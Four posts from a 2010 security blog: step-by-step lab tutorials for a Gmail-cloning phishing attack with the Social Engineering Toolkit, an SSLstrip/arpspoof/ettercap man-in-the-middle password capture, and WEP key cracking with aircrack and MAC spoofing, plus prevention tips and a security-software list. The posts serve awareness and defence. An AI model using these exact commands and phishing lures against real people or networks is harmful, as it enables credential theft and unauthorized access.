Monday, September 6, 2010

Social Engineering, Phishing Tutorial and Prevention Tips - Part 1

I am excited to be writing another blog post. It has been a while since my previous writing. Over the next month or so, I will be presenting you all with a series of social engineering attacks from a technical standpoint. In most cases, social engineering deals with manipulating a human being - an employee or an individual - to disclose personal information - username/password; social security number; credit card number; etc. - through a well-thought out scheme.

The technical standpoint I will be demonstrating are the different types of phishing attacks throughout the upcoming series of posts. Phishing is defined as a "criminally fraudulent process of attempting to acquire sensitive information such as usernames, passwords and credit card details by masquerading as a trustworthy entity in an electronic communication." The electronic communication mostly comes in form of e-mail or instant messaging. Phishing attacks are becoming more prevalent with time and the amount of money being lost every year from individuals' and organizations' are rising.

Phishing attacks has been increasing over the last years. According to a study conducted by the Gartner consulting firm, more than 5 million people in the United States lost money due to phishing attacks as of September 2008 which represents an increase of 39.8% with regards to the previous year. Additionally, the average amount of money lost due to phishing attacks in 2008 was $351, an increase from $256 in 2005. McAfee reported in the white paper, Phishing and Pharming: Understanding Phishing and Pharming, that $1.2 Billion was lost in 2003 due to phishing attacks. In 2007, Gartner reported, $3.2 Billion was lost due to phishing attacks.

These figures alone demonstrate that the general public is not aware of the types of phishing attacks or they are not taking it seriously. Another reason for my desire to write these series of posts happened after reading numerous articles from individuals' that fell victim to these attacks because they do not understand how it happened. Furthermore, I recently came across a McAfee sponsored website named, Stop H*Commerce. The website is very informative on how to protect yourself online from phishing attacks and identity theft. There is also a six episode series showing real life stories of people that got their lives destroyed by these heartless thieves. Lastly, a security vendor - Panda Security - released the top 10 Internet scams of the last decade and all ten Internet scams are some form of phishing attack or social engineering.

Now, onto the demonstration. For the first part of the series, I will be presenting a phishing attack to steal login credentials. For simplicity, I will be stealing email credentials but this process could be used for anything in relation to credit card information; such as, PayPal, online banking credentials, eBay, etc. In short, I will be sending an email containing a link to a spoofed website. In this case, it will be a counterfeit Gmail website. Once the victim clicks the link and enters their login information, that information will automatically be sent back to me and the fraud site will be redirected to the official Gmail website.
  • You may click on any of the screenshots for a bigger picture and greater clarity.
  • All links open in a new window.
Cracking Tutorial

Needed Equipment:

1. A computer to run Backtrack 4 - This is a Linux distribution containing a collection of penetration testing tools. We will be using the Social Engineering Toolkit. These tools are included with Backtrack distribution.
  • This link provides detailed instructions on multiple ways to run Backtrack on your computer.
2. I will be conducting this demonstration solely with VMware. The virtual computers will be consisted of a Windows XP computer and a BackTrack 4 Linux Distro.

Steps:


1. Boot up Backtrack. The login is "root" and the password is "toor." Do not include quotes or the period at the end of toor. Type "startx" at the next prompt.

2. Open up a Konsole window. It is the 3rd icon from the bottom right.

3. Type /ETC/INIT.D/NETWORKING START press enter. This will get our IP address that we will need later in this tutorial.

4. Type CLEAR press enter to clear the screen.

5. Type CD /PENTEST/EXPLOITS/SET and press enter to reach the Social Engineering Toolkit (SET) directory.


6. Type NANO CONFIG/SET_CONFIG to change the configuration of the SET.


 
7. Use the down arrow key until you reach the setting for "WEBATTACK_EMAIL" and make sure it is equal to "ON" instead of "OFF."
 
 
8. Hit ctrl + x to exit out of the configuration setting.


9. Now, let us start the SET.

10. Type ./SET




11. Select number "2" for Website Attack Vector


12. Select number "3" for Credential Harvester Attack Method


13. Select number "2" for the Site Cloner


14. Now we must decide the site we want to clone. Typically, the attacker will want to clone a website with login authentication. As mentioned earlier, I will clone the site of Gmail. Type HTTPS://GMAIL.COM and press enter.


15. We successfully cloned the website!!

16. Press enter again.

 
17. Type "1" since we are going to be attacking a single e-mail address. At this step, you may also attack as many e-mail addresses as you want by having the e-mail addresses typed in a text file with each one on their own line.
 
 
18. Type the e-mail address you want to lure in the phishing attack. As you see in the screenshot below, I typed LILRALPH713@GMAIL.COM.
 
 
19. At this step, we enter a source e-mail or we may spoof our e-mail address through the second option with the use of Sendmail. For simplicity of explanation and ease of intrusion, I will type a source e-mail. I will use SHBELAY@GMAIL.COM
 
 
20. Since we are using a specific source e-mail, we have to type in our password.


21. Now, for the deceitful e-mail we start with the subject. For this tutorial, I TYPE GMAIL AUTHENTICATION NEEDED IMMEDIATELY!


22. Onto the body of the email, I type CLICK ON THE LINK TO GO TO GMAIL AND CHANGE YOUR PASSWORD! HTTP://192.168.75.128 and press enter.
  • The web address I give them is my BackTrack 4 computer's IP address. You can find this out by opening a new shell and typing IFCONFIG
  • An attacker would add HTML coding to this message to hide the true URL address.  In essence, the victim would see gmail.com but behind the HTML the URL would be a very similar address or an IP address.

23. Hit ctrl + c to exit the message editing.


24. When you press enter, SET will now be listening on port 80 with your IP address.


25. Now, I go to my Windows XP computer and login into LILRALPH@GMAIL.COM to view the message.

Notice the web address! Users do not usually pay attetion to this small detail because they believe what they see and the link that was clicked.
Entering my login information
Look at the address again.  It has changed to the legit Gmail address.  Within the login authentication check, the victim information was sent to the attacker at a remote location.


Prevention Tips:

The following are policies and procedures that are typically instated in organizations and educational institutions. I will reiterate most of the policies and add what I feel is important.
  • Go to Stop H*Commerce and read the "Resource Center" - located at the top menu bar - and educate yourself on phishing techniques and tips on protection.
  • Read my previous post, Security Essential for a New Personal Computer.
  • Read the Federal Trade Commission's article, How Not to Get Hooked by a "Phishing Scam."
  • The Internet Crime Complaint Center (IC3) has some great tips for various cyber crimes @ Internet Crime Prevention Tips.
  • Never reply to an e-mail with your username, password, ID, or any other personal information. I cannot imagine an organization asking for this type of information. If it seems real, call the company or the help desk number that is posted on the official website - not the e-mail.
  • Never click on a link that directs you to a website where you must login to access information. Open a new tab or window and type the address manually.
What to do if you suspect that you were a victim of phishing scam:
  1. Change all the passwords that were exposed.
  2. Contact the institutions that was being impersonated and inform them of the situation.
  3. If your social security number, credit card numbers, driver license information, etc. was exposed, contact the following three major credit bureaus: Equifax, Experian, TransUnion.
  4. If possible, forward the e-mail to the institution that was being impersonated and to the FTC @ spam@uce.gov
  5. Submit your complaint @ FTC Complaint Assistant. Here is the direct link.
  6. File a complaint with IC3 @ http://www.ic3.gov/complaint/default.aspx
Sources:
  1. Social Engineering (security)
  2. Phishing and Pharming - Understanding phishing and pharming by McAfee
  3. Gartner Survey Shows Phishing Attacks Escalated in 2001; More than $3 Billion Lost to These Attacks
  4. Nigerian scam tops list of decade's online cons
Other interesting reads:
  1. Snoop Dogg Raps About Cyber Crime (Snoop Dogg fell victim to a phishing technique)
  2. Nothing New in Aurora Hack (A Google employee fell for a phishing technique and clicked on a malicous link; as a result, Google's network was penetrated)

Thursday, July 29, 2010

Insecurities of Today's Websites and How to Abate the Risk

Online activities by individuals are growing on a daily basis from social networking, communications by e-mail, shopping, money transferring through third parties, etc.  End-users expect these activities or transactions to be secure through username/password and SSL encryption.  Unfortunately, this is not the case with most popular websites.  I will be demonstrating the insecurities of common websites by intercepting username/password in clear text and at the end of the presentation I will present a solution to prevent you from being a victim  from this type of attack.

Presently, there is a false assumption of online security.  For example, when a user visits facebook.com, the address will display http://www.facebook.com.  The user enters their username/password and clicks "login."  The action of clicking "login" takes users to the encrypted site of facebook.com.  The user can verify this by viewing the address change to https://www.facebook.com.  The added "s" at the end of http stands for "secure" by using SSL/TLS protocol to provide encryption and secure identification.

The issue with this type of design is the initial unencrypted page when the user enters their information.  An attacker can intercept this session before the information is encrypted and sent for verification to Facebook server; afterward, the attacker sends the information to Facebook server for the user to receive the information they have requested.  The user will never know the attack is happening.  The attack is called Man-in-the-Middle (MITM).  In short, the attacker is in between the user's computer and the website's server viewing/recording all communication.


Now, for the demonstration.

Cracking Tutorial

Needed Equipment:

1. A computer to run Backtrack 4 - This is a Linux distribution containing a collection of penetration testing tools.  We will be using Ettercap and SSLStrip.  These tools are included with Backtrack distribution.
  • This link provides detailed instructions on multiple ways to run Backtrack on your computer.
2. A wireless adapter that allows passive packet sniffing and packet injection.  I am using Alfa AWUS036H Wireless Adapter.  The USB connection, good antenna, and ease of use makes the adapter a good choice.

3. A test network lab with two computers - the attacker and the victim - and a router or wireless access point.  I will be using a wireless access point to demonstrate the ease of the attack and the needed security awareness and precautions when accessing open Wi-Fi areas.

Steps:

1.    Boot up Backtrack.  The login is "root" and the password is "toor."  Do not include quotes or the period at the end of toor.  Type "startx" at the next prompt.

2.    Open up a Konsole window.  It is the 3rd icon from the bottom right.

3.    Type /etc/init.d/wicd start

4.    Click the KDE menu / go to Internet / click Wicd Network Manager and connect to the particular network.  Close the window and go back to the Konsole window.

5.    Type clear and hit enter

6.    Type kate /etc/etter.conf


7.    This command will open the file etter.conf in a notepad-type program called Kate.

8.    Scroll down to the "Linux" section and delete the two pound signs under "if you use iptables:."  



9.    Once you have completed the step, save the file and close the window.  The pound signs were used for comments.  In programming, comments are put in for the programmer and not for the program.  Consequently, these two lines of codes would not have run when needed for later in the demonstration.

10.    Go back to the Konsole window and type echo 1 > /proc/sys/net/ipv4/ip_forward


 11.    The command forwards IP (Internet Protocol) communication to our computer.  This allows our Backtrack computer to act as a router and receive communication from our target/victim.  In short, our victim's computer will send all their traffic to our computer instead of the wireless router access point.

12.    Type clear to clear our window.

13.    Type arpspoof -i wlan0 -t 192.168.1.100 192.168.1.1
  • This allows us to send unsolicited ARP responses and let us become any IP address on a local network.
  • -i stands for interface that we are using; which is wlan0.
  • -t stands for target.  Following the option is the target/victim's IP address, which is 192.168.1. 100
  • Following the victim's IP address is the actual wireless router (gateway) IP address that we are becoming and fooling the victim's computer into sending us their traffic.
  • When we hit enter, we start letting the victim know that the gateway IP is our MAC address.  Now, our target is going to be sending their traffic to us instead of the real gateway.
14.    To discover your interface on Backtrack, open a Konsole window and type ifconfig.  Whatever interface has an IP address is the interface that you are utilizing.


15.    My target computer is a Windows machine.  To know the IP address, go to Start and type cmd in the run/search box.  Type ipconfig to know your Ethernet adapter IP address.


16.    You will see the target IP address; as well as, the gateway IP address.

17.    When you type the arpspoof command and hit enter, you should see the following screenshots.


18.    Now, open a new Konsole window or new shell (by going to session/shell) and type iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
  • This command reroutes communication coming from port 80 to port 10000 on our computer.  We are going to be setting up SSLstrip to be listening on port 10000 on our system.

19.    Hit enter and type clear and hit enter to clear screen.

20.    Type, sslstrip -a -k -f
  • -a means to log all SSL and HTTP traffic to and from server
  • -k means kill sessions in progress.  For example, if they were logged into Gmail, Facebook, Paypal, etc., this command would log them out of the site; therefore, they could log back in with their credentials.
  • -f means to put a fake lock on the browser to make it seem the connection is secure.

21.    Hit enter, this will create a sslstrip.log file on your desktop.  This file will log all the traffic from your victim.


22.    Now, open a new Konsole window or shell (by going to session/shell).

23.    Type ettercap -T -q -i wlan0
  • -T means to display text
  • -q means to be quiet and do not display packet contents.  
  • -i means interface that we are using.
  • On the actual Konsole window we are using, the username/passwords will display when the user logs into a website.  This happens instantaneously.  For further details in their Internet usage, you can view the sslstrip.log file on your desktop.

24.    Hit enter and the following screenshot will display


25.    When your target visits a website requiring a username/password, it will automatically be posted onto your screen in clear text.  This is due to the SSL encrypted session being stripped and a phony lock being posted on the browser to make it seem the session is still secure.  The following screen shots displays examples of a SSL session being stripped.  The first one is a secure session by examining there is a "s" at the end of "http" and there is a legit certificate at the right hand side of the address bar.  The second one is a SSL session being stripped by examining there is not a "s" at the end of "http" and by seeing the phony lock at the left hand side of the address bar.  Internet Explorer does not display the lock at the left hand side.  For Mozilla Firefox, they display a green bar or a blue bar depending on the security level at the left hand side of the address bar.


26.    Now, for the intercepting of the target's traffic.  I posted multiple screenshots of different websites that require a username/password.  The last screen shot will display the username/password in clear text.

Username: shbelay / Password: password
Username: shbelay@gmail.com / Password: password
Username: shbelay / Password: password


As you can see, the username/password is in red and the website information I intercepted is in green.  I was able to do this with multiple websites; including, Paypal, Hotmail, and Amazon.  Furthermore, the "sslstrip.log" file will log your entire browsing session.  This possibly will be able to log personal identifiable information and credit card numbers.

How to Protect Yourself

Protecting yourself online from these type of attacks is as simple as typing "https://" before the website address to ensure that you are on a secure website.  The issue presently is websites put their username/password boxes on an unsecured website.  For example when you enter the following addresses: amazon.com; facebook.com; ebay.com; paypal.com; etc., you will receive an "http" site.

Of course, no one wants to type "https" every time they logon to a website.  An easy substitution for this task is to install a Mozilla Firefox add-on called HTTPS Everywhere.  Unfortunately, Internet Explorer does not have this capability.  As a result, I recommend using Mozilla Firefox for this issue, unless you are willing to type "https://" every time in Internet Explorer.

I installed this add-on and was unable to strip the SSL connection.  I received the following screenshots when viewing the following websites:


The browser is informing me that it cannot verify the certificate of the website's server and to exit or enter at your own risk.  As always, I will mention that there is not a computer or network that is completely secure.  The intention is to become more secure than the next computer/network or make it as difficult to break into the security barriers.

Thursday, July 8, 2010

Security Essentials for a New Personal Computer

Identity theft and malware are on a rapid rise for profit.  Black hat hacking has become a billion dollar business through anonymity and covert operations.  For individuals buying new computers, it is essential to install a few security programs.  When connecting to the Internet with a computer as bought, it is within a short period of time (most likely within an hour) the computer will be cracked without warning.  Anti-virus software and spyware/malware protection software is not enough for the sophistication and ease-of-use of today's hacker tools.

Anybody can become a victim without proper precautions.  For those still skeptical, there are plenty of Trojans available for purchase on the Internet that are made specifically to steal bank account information, social security numbers, or any personal identifiable information.  Black hat hackers scan the Internet for open ports and send these Trojans through the ports or by e-mail through phishing.  Once installed and undetected, the information is automatically sent back to the perpetrator.  This happens without the person's knowledge while logging into their bank site, filling out forms for credit cards, or buying an item online.  We have to be very cautious and use good judgment while surfing the web.

The following are free software that I recommend to install immediately when a new computer is bought.

  1. Anti-virus Software is needed to protect your computer from viruses before they cause any damage.  Avast (download) is widely used and respected.  Avast has one for purchase for greater protection.
  2. Spyware/Adaware/Malware protection is needed to protect your browsing information from being logged and sent back to the creator without permission and possibly for malicious intent.  I install three programs since each of them usually catch malicious software that was not caught by the others.  The following are: Ad-aware, Malwarebytes, and Spybot.
  3. Firewall is extremely important to keep hackers away.  As mentioned, they look for open ports used by the individual's computer to have complete access.  Firewalls can be configured to block all incoming connections until the user permits access.  The firewall I use is Comodo Firewall.
  4. Microsoft Security Essentials is an incredible product that provides real-time protection.  I found that this product usually catches malicious software before my anti-virus software and malware protection software.  Microsoft continuously updates this product with the latest threats.
  5. Registry cleaner is needed to find any suspicious files or files that stayed in the registry after uninstalling a program.  This type of software helps the system's performance.  A good software is CCleaner.
  6. Lastly and I believe most important is a patching program.  There are hacker tools that provide information on the type of software version that is installed on the computer.  If the software is not updated, it will be extremely easy to crack into the computer through information provided by the manufacturer on the necessary update.  I installed two patching programs.  The one I regularly use is FileHippo.  In addition, I periodically use Secunia PSI.  To learn more about patching and its importance, read my blog post, Importance of Patches.

Others that would be good to have but not necessary are:

  1. Microsoft Baseline Security Analyzer is designed for IT professionals in small/medium sized business.  I have this installed for my personal computer and found it very helpful.  The program will scan Microsoft products installed on the computer and have suggestions and how-to's for making the specific Microsoft program more secure.  It is a great product.
  2. I suggest using Mozilla Firefox browser for its add-ons.  The open-source community is consisted of incredibly amazing individuals.  They write software programs and provide them to the public for free-of-use.  The following add-ons I use for safer browsing are: NoScript, AdBlock, and HTTPS Everywhere.
  • NoScript blocks software languages - Java, Javascript, Flash, etc. - that are mainly used by black hat hackers as executables to install malicous software.  You have the ability to temporarly or permanantly allow the scripts to load for the specific website.
  • AdBlock is, as you most likely have figured, an ad-blocking program.
  • HTTPS Everywhere provides a secure connection to sites that offer that option by encryption.  The following is quote from the website:
"Many sites on the web offer some limited support for encryption over HTTPS, but make it difficult to use. For instance, they may default to unencrypted HTTP, or fill encrypted pages with links that go back to the unencrypted site."
 For now, these are my recommended programs for computers to stay safe while browsing the Internet.  Though, as repeated in the information security community, security never stays stagnant and is a continuous process due to black hat hackers becoming more intelligent and their tools becoming more sophisticated in cracking computers and networks.

Saturday, June 5, 2010

Cracking WEP Encrypted Wireless Network and Solution to Stronger Security

This tutorial will explain the steps in cracking into a WEP (Wired Equivalent Privacy) encrypted wireless network, the reason for the vulnerabilities in WEP, and proper steps in protecting yourself from having your wireless network penetrated.

Cracking Tutorial

Needed Equipment:

1. A computer to run Backtrack 4 - This is a Linux distribution containing a collection of penetration testing tools. We will be using the Aircrack suite that is included with the Backtrack distribution.
  • This link provides detailed instructions on multiple ways to run Backtrack on your computer.

2. A wireless adapter that allows passive packet sniffing and packet injection. I am using Alfa AWUS036H Wireless Adapter. The USB connection, good antenna, and ease of use makes the adapter a good choice.

3. Wireless router. I am using Cisco-Linksys WRT54GL wireless router.

Steps:

1. Boot up Backtrack. The login is "root" and the password is "toor." Do not include quotes or the period at the end of toor. Type "startx" at the next prompt.

2. Open up a Konsole window. It is the 3rd icon from the right on the lower left hand corner.
  • In the steps, I post what I actually typed as you can see on the screen shots.  Below the steps is the syntax for the command line. Replace the word in the parenthesis for your actual data. Click on the screen shots for an expanded view.

3. Type airmon-ng at the command prompt and press enter to list the adapters associated with your computer. I only have the Alfa adapter which is the wlan0 interface.
airmon-ng



4. Type airmon-ng stop wlan0 and press enter. This step is wlan0 out of monitoring mode.
airmon-ng stop (interface)



5. Type ifconfig wlan0 down and press enter. The step enables us to change our MAC address in the next step so we can access the wireless router even if it has a MAC address filter to prevent outsiders from entering.
ifconfig (interface) down



6. Type macchanger --mac 00:11:22:33:44:55 wlan0 and press enter. The MAC address is a physically embedded address for the NIC card. Every computer has a different MAC address. In order to penetrate into a wireless network with MAC filtering enabled, we would have to find out a legit MAC address that we can copy. For this tutorial, I am hacking into my own network without MAC filtering. I will be using a bogus MAC address for demonstration purposes.
macchanger --mac 00:11:22:33:44:55 (interface)



7. Type airmon-ng start wlan0 and press enter. This will put the wireless adapter in monitor mode.
airmon-ng start (interface)



8. Type airodump-ng wlan0 and press enter to display a list of wireless networks to penetrate. In the figure below, my network is listed second. Once you spot the network, hit ctrl+c together to stop the process.
airodump-ng (interface)



9. Type airodump-ng -c 6 -w Li --bssid 68:7F:74:27:99:B5 wlan0 and press enter. The -c 6 indicates channel 6; -w Li indicates that I will be saving a file named Li that will contain collected data packets. The bssid is the MAC address of the wireless router and wlan0 is the interface.
airodump-ng -c (channel) -w (file name) --bssid (bssid) (interface)



10. The figure below automatically pops up. Now, you are capturing data packets and saving the data packets to the specified file named earlier. You will need around 20,000 data packets to crack the WEP key. I've read the number of packets go as high as 80,000. The number in the "#Data" column is the amount of packets captured.



11. Open a new Konsole window and type aireplay-ng -1 0 -a 68:7F:74:27:99:B5 -h 00:11:22:33:44:55 -e LilRalph wlan0 and press enter.
aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) (interface)



12. Type aireplay-ng -3 -b 68:7F:74:27:99:B5 -h 00:11:22:33:44:55 wlan0 and press enter. We are creating more router traffic to speed up the process of cracking the WEP key.
aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (interface)



13. Once you have captured enough packets, open up a new Konsole window and type aircrack-ng -b 68:7F:74:27:99:B5 Li-01.cap and press enter.  "Li-01.cap" is the file I created in step 9. I posted my screen shot of the file saved to the desktop. You can try every 5,000 packets. If it is not enough to crack the WEP key, the screen will display that it did not succeed and wait for more data packet capture. If it did succeed cracking the WEP key, it will display the figure below with key in hexadecimal format. You can type this hexadecimal number into the text box for the key without the colons and you successfully hacked into the wireless network.
aircrack-ng -b (bssid) (file name-01.cap)

 *The file, Li-01.cap, is where I will be saving the data captures


*Waiting for result.....


*....still waiting


*Failed. Hit ctrl+z to stop and the next time you try again, hit the up arrow key and press enter.


*Yay. Passed. Now, enter that security key without the colons to enter the network.

Insight

WEP uses a RC4 stream cipher encryption algorithm. The 128 bit WEP key uses 104 bits for the key plus 24 bits for the initialization vector (IV). The security issue and ease of cracking WEP is linked to the length of the IV and being sent in clear text with the encrypted data packets using RC4 algorithm. The clear text IV will eventually repeat itself with different encrypted data packets. WEP's IV size of 24 bits provides for 16,777,216 (each bit is a 1 or a 0, thus 2 to the 24th power) different RC4 cipher streams for a given WEP key, for any key size. Depending on the amount of traffic (number of users on the network), the key can be cracked in a short amount of time.

Solution

Use WPA2 Personal with TKIP+AES or PSK encryption. The only realistic way for this security to be hacked is by having a weak password that can cracked by password cracking tools. Another way which is feasible but unrealistic is by brute force. Brute force means trying every password combination with all possible characters. The crack is feasible with time but unrealistic by length of time it will take to crack a strong password. Therefore, use a strong password (guidelines and examples) for the key to the network. I recommend using this password generator site to generate a 63 character password and storing the password in Keepass (blog post about the product).